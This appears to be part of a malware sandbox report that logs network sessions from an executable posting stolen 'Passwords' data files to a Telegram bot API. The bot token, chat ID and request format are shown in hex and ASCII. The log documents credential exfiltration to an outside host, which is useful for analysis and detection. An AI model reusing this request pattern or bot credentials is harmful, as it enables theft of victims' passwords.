2025-01-10 21:32:13 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 65 36 32 65 33 65 39 33 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32fe62e3e93fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:13 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:13 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43592,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544733,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.3	50020	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:14 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33123f8d9267 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:14 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 32 33 66 38 64 39 32 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33123f8d9267Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:14 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:14 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43593,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544734,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.3	50022	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:16 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3324bc118176 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:16 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 34 62 63 31 31 38 31 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3324bc118176Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:16 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:16 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43594,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544736,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.3	50024	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:17 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33387c549528 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:17 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 38 37 63 35 34 39 35 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33387c549528Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:18 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:18 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43595,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544738,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.3	50026	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:19 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd334ade3c8869 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:19 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 61 64 65 33 63 38 38 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd334ade3c8869Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:20 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:20 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43596,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544740,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.3	50028	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:21 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3367a8105a58 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:21 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 37 61 38 31 30 35 61 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3367a8105a58Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:21 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:21 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43597,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544741,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.3	50030	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:23 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd337dd438127d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:23 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 64 64 34 33 38 31 32 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd337dd438127dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:23 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:23 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43598,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544743,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.3	50032	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:24 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd339688ded35d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:24 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 36 38 38 64 65 64 33 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd339688ded35dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:25 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
